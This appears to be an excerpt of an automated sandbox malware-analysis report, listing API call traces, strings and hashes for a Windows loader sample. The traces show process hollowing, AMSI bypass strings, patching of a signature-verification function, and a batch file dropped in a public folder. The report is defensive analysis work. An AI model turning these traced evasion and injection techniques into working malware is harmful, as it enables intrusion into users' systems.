                                                                                        • String ID: .url$<i$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$bcrypt$can$endpointdlp$http$ieproxy$iexpress.exe$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                        • API String ID: 2725267379-2437051637
                                                                                        • Opcode ID: 75e1aeec5ef8a0f89cb0c9aae3923b90aefe5fd7ba342f3895860fde09ab0e37
                                                                                        • Instruction ID: 25282cf63fff58e35b71d85727c2540ecfe5b3e3bd65487b47f4eae89523e043
                                                                                        • Opcode Fuzzy Hash: 75e1aeec5ef8a0f89cb0c9aae3923b90aefe5fd7ba342f3895860fde09ab0e37
                                                                                        • Instruction Fuzzy Hash: 3904DF34A502598FDB20FBA4DC94EEEB3B7EB85300F5085A5E009E7354DA70AE95CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph for 2d85fa0-2d88b96 [rendered graph not recoverable as text; the basic-block list names the direct API calls GetCurrentProcess, EnumSystemLocalesA and ExitProcess, with the remaining nodes being calls to internal functions such as 2d64824, 2d64964, 2d64698, 2d647b0, 2d77be8, 2d648b0, 2d62ee0, 2d62f08, 2d77968, 2d649bc, 2d7c5bc, 2d7d198, 2d67e18, 2d7c74c, 2d644f4, 2d64da4, 2d64728, 2d7c3f8 and 2d77f48]
                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                          • Part of subcall function 02D62EE0: QueryPerformanceCounter.KERNEL32 ref: 02D62EE4
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC), ref: 02D8681D
                                                                                          • Part of subcall function 02D77968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                          • Part of subcall function 02D77968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                          • Part of subcall function 02D77968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344), ref: 02D86B4F
                                                                                          • Part of subcall function 02D67E18: GetFileAttributesA.KERNEL32(00000000,?,02D7E0EE,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,UacInitialize), ref: 02D67E23
                                                                                          • Part of subcall function 02D7C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C4CA), ref: 02D7C437
                                                                                          • Part of subcall function 02D7C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D7C471
                                                                                          • Part of subcall function 02D7C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D7C49E
                                                                                          • Part of subcall function 02D7C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D7C4A7
                                                                                        • ExitProcess.KERNEL32(00000000,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,Initialize,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC), ref: 02D88B96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AddressHandleModulePathProcProcess$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                        • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                        • API String ID: 724724934-2845693168
                                                                                        • Opcode ID: 27bfa696791325dce1b637ba160ccfb1c1828ae8a185d7d0ec98573258900a3b
                                                                                        • Instruction ID: 9d3501eb09e64a356fefe39866bce1358522ea2d132f617fcb26d98f9b84edde
                                                                                        • Opcode Fuzzy Hash: 27bfa696791325dce1b637ba160ccfb1c1828ae8a185d7d0ec98573258900a3b
                                                                                        • Instruction Fuzzy Hash: 2F330F34A502598FDB20FBA4DC949EEB3B6EF85300F5045E5E009EB364DA70AE95CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DC5398,02DC5388,OpenSession,02DC5360,02D79A30,ScanString,02DC5360), ref: 02D78446
                                                                                        • GetThreadContext.KERNEL32(00000870,02DC53DC,ScanString,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,ScanBuffer,02DC5360,02D79A30,ScanBuffer,02DC5360,02D79A30,UacInitialize,02DC5360), ref: 02D787DF
                                                                                        • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,002CCFF8,02DC54B0,00000004,02DC54B8,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360), ref: 02D78A3C
                                                                                        • NtUnmapViewOfSection.N(0000087C,00400000,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,002CCFF8,02DC54B0,00000004,02DC54B8), ref: 02D78BB7
                                                                                          • Part of subcall function 02D77968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                          • Part of subcall function 02D77968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                          • Part of subcall function 02D77968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,00400000,00000000,1DC54500,02DC54B8,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,ScanBuffer,02DC5360), ref: 02D7920B
                                                                                        • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,002CCFF8,02DC54B4,00000004,02DC54B8,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,00400000), ref: 02D7937E
                                                                                        • SetThreadContext.KERNEL32(00000870,02DC53DC,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,002CCFF8,02DC54B4,00000004,02DC54B8), ref: 02D794F4
                                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000870,00000000,00000870,02DC53DC,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,002CCFF8,02DC54B4), ref: 02D79501
                                                                                          • Part of subcall function 02D77AC0: LoadLibraryW.KERNEL32(bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC,ScanString,02DC5360,02D79A30), ref: 02D77AD2
                                                                                          • Part of subcall function 02D77AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D77ADF
                                                                                          • Part of subcall function 02D77AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize), ref: 02D77AF6
                                                                                          • Part of subcall function 02D77AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC), ref: 02D77B05
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc$IC
                                                                                        • API String ID: 2533507481-3678116285
                                                                                        • Opcode ID: 67fb9e229e2d53dca7e23163fcf18075d0c2ea7a0175a04ec1dceade3de7d6d8
                                                                                        • Instruction ID: 3c0f733043452f38362fbd92b144ce4bf9f1ec6562fe5b274fd7934a49f3854a
                                                                                        • Opcode Fuzzy Hash: 67fb9e229e2d53dca7e23163fcf18075d0c2ea7a0175a04ec1dceade3de7d6d8
                                                                                        • Instruction Fuzzy Hash: EEE22F31A411699FEB21EBA0DC94BEE73B6EF45700F1045A6E009BB314EE74AE45CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02DC5398,02DC5388,OpenSession,02DC5360,02D79A30,ScanString,02DC5360), ref: 02D78446
                                                                                        • GetThreadContext.KERNEL32(00000870,02DC53DC,ScanString,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,ScanBuffer,02DC5360,02D79A30,ScanBuffer,02DC5360,02D79A30,UacInitialize,02DC5360), ref: 02D787DF
                                                                                        • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,002CCFF8,02DC54B0,00000004,02DC54B8,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360), ref: 02D78A3C
                                                                                        • NtUnmapViewOfSection.N(0000087C,00400000,ScanBuffer,02DC5360,02D79A30,ScanString,02DC5360,02D79A30,Initialize,02DC5360,02D79A30,0000087C,002CCFF8,02DC54B0,00000004,02DC54B8), ref: 02D78BB7
                                                                                          • Part of subcall function 02D77968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02D77975
                                                                                          • Part of subcall function 02D77968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02D7797B
                                                                                          • Part of subcall function 02D77968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D7799B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc$IC
                                                                                        • API String ID: 3979268988-3678116285
                                                                                        • Opcode ID: 1439d0662a75054c79658631bd8e7eb8d8945f84aabd3be3042b982d857c1145
                                                                                        • Instruction ID: 4195801a1987daf057053832354dc44a2604602337da0afbad2f29db36940283
                                                                                        • Opcode Fuzzy Hash: 1439d0662a75054c79658631bd8e7eb8d8945f84aabd3be3042b982d857c1145
                                                                                        • Instruction Fuzzy Hash: 91E22F31A411699FEB21EBA0DC94BEE73B6EF45700F1045A6E009BB314EE74AE45CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D60000,02D8B790), ref: 02D65AAC
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D60000,02D8B790), ref: 02D65ACA
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D60000,02D8B790), ref: 02D65AE8
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D65B06
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D65B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D65B4F
                                                                                        • RegQueryValueExA.ADVAPI32(?,02D65CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D65B95,?,80000001), ref: 02D65B6D
                                                                                        • RegCloseKey.ADVAPI32(?,02D65B9C,00000000,?,?,00000000,02D65B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D65B8F
                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D65BAC
                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D65BB9
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D65BBF
                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D65BEA
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D65C31
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D65C41
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D65C69
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D65C79
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D65C9F
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D65CAF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                        • API String ID: 1759228003-2375825460
                                                                                        • Opcode ID: 1d57a02b5b4aaeba92be0ceb3202deeed7289e675d5857e7a061eafed4101763
                                                                                        • Instruction ID: 8d3f82cfec7bbbe01f4780a405a260ec23c1a6316923526aa36c4d2f9a426197
                                                                                        • Opcode Fuzzy Hash: 1d57a02b5b4aaeba92be0ceb3202deeed7289e675d5857e7a061eafed4101763
                                                                                        • Instruction Fuzzy Hash: E1514FB1A4020D6BFB21D6A4DC4AFFE77ADDB08744F8041A1A604E6381E674DE84CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 12240 2d7ca6c-2d7ca70 12241 2d7ca75-2d7ca7a 12240->12241 12241->12241 12242 2d7ca7c-2d7cf2f call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64704 * 2 call 2d64824 call 2d6473c call 2d63098 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64704 call 2d67ee8 call 2d64964 call 2d64d38 call 2d64db4 call 2d64704 call 2d64964 call 2d64d38 call 2d64db4 CreateProcessAsUserW call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 12241->12242 12403 2d7cf35-2d7d035 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 WaitForSingleObject CloseHandle * 2 12242->12403 12404 2d7d03a-2d7d087 call 2d644c4 call 2d64c24 call 2d644c4 call 2d64c24 call 2d644c4 12242->12404 12403->12404
                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02DC5644,02DC5688,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344), ref: 02D7CDD3
                                                                                        • WaitForSingleObject.KERNEL32(00000860,000000FF,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,UacScan,02DC5344), ref: 02D7D01F
                                                                                        • CloseHandle.KERNEL32(00000860,00000860,000000FF,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,UacScan), ref: 02D7D02A
                                                                                        • CloseHandle.KERNEL32(000005E4,00000860,00000860,000000FF,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4,ScanString,02DC5344,02D7D0A4,OpenSession,02DC5344,02D7D0A4), ref: 02D7D035
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                        • String ID: *"C:\Users\Public\Libraries\XjfxsfmnO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                        • API String ID: 1205125484-3278934373
                                                                                        • Opcode ID: 04b818dc3055aecf67f7ff456ed3c64cde8124a070495a1deb704635bc4ba14a
                                                                                        • Instruction ID: ccd81ae1f4cbbe1347aa1440ef014536393f85ef423bdc3e8406033378dfd0e1
                                                                                        • Opcode Fuzzy Hash: 04b818dc3055aecf67f7ff456ed3c64cde8124a070495a1deb704635bc4ba14a
                                                                                        • Instruction Fuzzy Hash: 1CF1EE34A401599FEB20FBA4D884BEE73B7EF85700F608566E108BB354DB74AD468F61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 12444 2d77ac0-2d77adb LoadLibraryW 12445 2d77add-2d77ae6 GetProcAddress 12444->12445 12446 2d77b0a-2d77b12 12444->12446 12447 2d77b04-2d77b05 FreeLibrary 12445->12447 12448 2d77ae8-2d77b00 NtWriteVirtualMemory 12445->12448 12447->12446 12448->12447 12449 2d77b02 12448->12449 12449->12447
                                                                                        APIs
                                                                                        • LoadLibraryW.KERNEL32(bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC,ScanString,02DC5360,02D79A30), ref: 02D77AD2
                                                                                        • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D77ADF
                                                                                        • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000087C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize), ref: 02D77AF6
                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02D79A30,Initialize,02DC5360,02D79A30,UacScan,02DC5360,02D79A30,UacInitialize,02DC5360,02D79A30,00000870,02DC53DC), ref: 02D77B05
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                        • String ID: BCryptVerifySignature$bcrypt
                                                                                        • API String ID: 1002360270-4067648912
                                                                                        • Opcode ID: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
